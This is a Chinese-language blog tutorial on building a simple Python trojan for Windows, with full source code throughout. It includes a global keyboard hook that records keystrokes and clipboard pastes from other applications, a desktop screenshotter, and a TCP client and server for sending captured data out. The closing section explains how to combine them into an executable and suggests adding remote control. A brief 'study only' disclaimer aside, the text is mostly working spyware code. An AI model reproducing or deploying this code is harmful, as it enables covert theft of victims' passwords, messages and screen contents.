Python编写简易木马程序

时间:2023-02-22 09:55:05

Python编写简易木马程序



0x00 准备


文章内容仅供学习研究、切勿用于非法用途!

这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413

首先准备好我们需要的依赖库,python hook和pythoncom。

下载安装python hook

Python编写简易木马程序

下载安装pythoncom模块:

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.7.exe/download

Python编写简易木马程序

如果觉得麻烦,你可以直接使用集成了所有我们所需要的python库的商业版Activepython(我们可以用他的免费版):

http://www.activestate.com/activepython

0x01 键盘记录器


说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了。抛开高科技,我们暂且回归本质,探探简易键盘记录器的原理与实现。

Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。

代码部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# -*- coding: utf-8 -*-  
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
 
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
 
#
def get_current_process():
 
     # 获取最上层的窗口句柄
     hwnd = user32.GetForegroundWindow()
 
     # 获取进程ID
     pid = c_ulong( 0 )
     user32.GetWindowThreadProcessId(hwnd,byref(pid))
 
     # 将进程ID存入变量中
     process_id = "%d" % pid.value
 
     # 申请内存
     executable = create_string_buffer( "\x00" * 512 )
     h_process = kernel32.OpenProcess( 0x400 | 0x10 , False ,pid)
 
     psapi.GetModuleBaseNameA(h_process, None ,byref(executable), 512 )
 
     # 读取窗口标题
     windows_title = create_string_buffer( "\x00" * 512 )
     length = user32.GetWindowTextA(hwnd,byref(windows_title), 512 )
 
     # 打印
     print
     print "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
     print
 
     # 关闭handles
     kernel32.CloseHandle(hwnd)
     kernel32.CloseHandle(h_process)
 
# 定义击键监听事件函数
def KeyStroke(event):
 
     global current_window
 
     # 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
     if event.WindowName ! = current_window:
         current_window = event.WindowName
         # 函数调用
         get_current_process()
 
     # 检测击键是否常规按键(非组合键等)
     if event.Ascii > 32 and event.Ascii < 127 :
         print chr (event.Ascii),
     else :
         # 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
         if event.Key = = "V" :
             win32clipboard.OpenClipboard()
             pasted_value = win32clipboard.GetClipboardData()
             win32clipboard.CloseClipboard()
             print "[PASTE]-%s" % (pasted_value),
         else :
             print "[%s]" % event.Key,
     # 循环监听下一个击键事件
     return True
 
# 创建并注册hook管理器
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
 
# 注册hook并执行
kl.HookKeyboard()
pythoncom.PumpMessages()

【知识点】钩子(Hook):Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。

撸代码时一定要注意严格区分大小写。检查无误后启动keylogger:

Python编写简易木马程序

然后可以尝试打开记事本写点东西,过程中可以看到我们的keylogger窗口正在对我们的输入实时记录:

Python编写简易木马程序

切换窗口时会自动跟踪到新窗口(众:这点功能都没有还敢叫keylogger吗!),light教授趁机骚扰一下疯狗,可以看到我们的keylogger已经跟踪到QQ聊天窗口,并忠实的记录下我输入的一切。

Python编写简易木马程序

0x02 看看你在干什么:编写一个screenshotter


截屏实现起来更简单,直接调用几个gui相关的api即可,我们直接看代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# -*- coding: utf-8 -*-  
import win32gui
import win32ui
import win32con
import win32api
 
# 获取桌面
hdesktop = win32gui.GetDesktopWindow()
 
# 分辨率适应
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
 
# 创建设备描述表
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
 
# 创建一个内存设备描述表
mem_dc = img_dc.CreateCompatibleDC()
 
# 创建位图对象
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
 
# 截图至内存设备描述表
mem_dc.BitBlt(( 0 , 0 ), (width, height), img_dc, (left, top), win32con.SRCCOPY)
 
# 将截图保存到文件中
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp' )
 
# 内存释放
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())

看看效果如何:

Python编写简易木马程序

0x03 综合运用:完成一个简易木马


无论是keylogger记录下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需要构建一个简单server和client端来进行通信,传输记录下的内容到我们的服务器上。

编写一个简单的TCPclient

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# -*- coding: utf-8 -*-
import socket
 
# 目标地址IP/URL及端口
target_host = "127.0.0.1"
target_port = 9999
 
# 创建一个socket对象
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 
# 连接主机
client.connect((target_host,target_port))
 
# 发送数据
client.send( "GET / HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n" )
 
# 接收响应
response = client.recv( 4096 )
 
print response

编写一个简单的TCPserver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# -*- coding: utf-8 -*-
import socket
import threading
 
# 监听的IP及端口
bind_ip = "127.0.0.1"
bind_port = 9999
 
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 
server.bind((bind_ip,bind_port))
 
server.listen( 5 )
 
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
 
def handle_client(client_socket):
 
     request = client_socket.recv( 1024 )
 
     print "[*] Received:%s" % request
 
     client_socket.send( "ok!" )
 
     client_socket.close()
 
while True :
 
     client,addr = server.accept()
 
     print "[*] Accept connection from:%s:%d" % (addr[ 0 ],addr[ 1 ])
 
     client_handler = threading.Thread(target = handle_client,args = (client,))
 
     client_handler.start()

开启服务端监听:

Python编写简易木马程序

客户端执行:

Python编写简易木马程序

服务端接收到客户端的请求并作出响应:

0x04 结语


最后,你需要做的就是把上面三个模块结合起来,一个简易的具有键盘记录、屏幕截图并可以发送内容到我们服务端的木马就完成了。可以使用py2exe把脚本生成exe可执行文件。当然你还可以继续发挥,加上远程控制功能。Py2exe用法可以参考这里:

http://www.py2exe.org/index.cgi/Tutorial

Enjoy coding~

参考文档:

《Black Hat Python》 https://www.google.com https://www.python.org/ http://www.py2exe.org